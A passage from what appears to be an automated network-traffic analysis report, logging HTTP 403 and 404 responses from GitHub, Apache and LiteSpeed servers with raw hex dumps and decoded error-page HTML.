20 3c 74 69 74 6c 65 3e 55 6e 69 63 6f 72 6e 21 20 26 6d 69 64 64 6f 74 3b 20 47 69 74 48 75 62 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 31 66 31 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 20 6d 61 72 67 69 6e 3a 20 35 30 70 78 20 61 75 74 6f 20 34 30 70 78 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 20 23 34 31 38 33 63 34 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0d 0a 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 68 31 20 7b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 36 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 23 66 66 66 3b 20 7d 0d 0a 20 20 20 20 20 20 70 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 35 29 3b 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 31 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 66 6f
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cacheContent-Type: text/html; charset=utf-8Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 0Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 0d 0a 0d 0a 48 65 6c 6c 6f 20 66 75 74 75 72 65 20 47 69 74 48 75 62 62 65 72 21 20 49 20 62 65 74 20 79 6f 75 27 72 65 20 68 65 72 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 6f 73 65 20 6e 61 73 74 79 20 69 6e 6c 69 6e 65 20 73 74 79 6c 65 73 2c 0d 0a 44 52 59 20 75 70 20 74 68 65 73 65 20 74 65 6d 70 6c 61 74 65 73 20 61 6e 64 20 6d 61 6b 65 20 27 65 6d 20 6e 69 63 65 20 61 6e 64 20 72 65 2d 75 73 61 62 6c 65 2c 20 72 69 67 68 74 3f 0d 0a 0d 0a 50 6c 65 61 73 65 2c 20 64 6f 6e 27 74 2e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 79 6c 65 67 75 69 64 65 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2e 30 0d 0a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 55 6e 69 63 6f 72 6e 21 20 26 6d 69 64 64 6f 74 3b 20 47 69 74 48 75 62 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 31 66 31 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 20 6d 61 72 67 69 6e 3a 20 35 30 70 78 20 61 75 74 6f 20 34 30 70 78 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 20 23 34 31 38 33 63 34 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0d 0a 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 68 31 20 7b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 36 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 23 66 66 66 3b 20 7d 0d 0a 20 20 20 20 20 20 70 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 35 29 3b 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 31 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 66 6f
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cacheContent-Type: text/html; charset=utf-8Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 0Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 0d 0a 0d 0a 48 65 6c 6c 6f 20 66 75 74 75 72 65 20 47 69 74 48 75 62 62 65 72 21 20 49 20 62 65 74 20 79 6f 75 27 72 65 20 68 65 72 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 6f 73 65 20 6e 61 73 74 79 20 69 6e 6c 69 6e 65 20 73 74 79 6c 65 73 2c 0d 0a 44 52 59 20 75 70 20 74 68 65 73 65 20 74 65 6d 70 6c 61 74 65 73 20 61 6e 64 20 6d 61 6b 65 20 27 65 6d 20 6e 69 63 65 20 61 6e 64 20 72 65 2d 75 73 61 62 6c 65 2c 20 72 69 67 68 74 3f 0d 0a 0d 0a 50 6c 65 61 73 65 2c 20 64 6f 6e 27 74 2e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 79 6c 65 67 75 69 64 65 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2e 30 0d 0a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 55 6e 69 63 6f 72 6e 21 20 26 6d 69 64 64 6f 74 3b 20 47 69 74 48 75 62 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 31 66 31 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 20 6d 61 72 67 69 6e 3a 20 35 30 70 78 20 61 75 74 6f 20 34 30 70 78 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 20 23 34 31 38 33 63 34 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0d 0a 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 68 31 20 7b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 36 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 23 66 66 66 3b 20 7d 0d 0a 20 20 20 20 20 20 70 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 35 29 3b 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 31 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 66 6f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Dec 2024 03:08:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Dec 2024 03:08:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Dec 2024 03:08:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Dec 2024 03:08:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 23 Dec 2024 03:10:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 23 Dec 2024 03:10:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 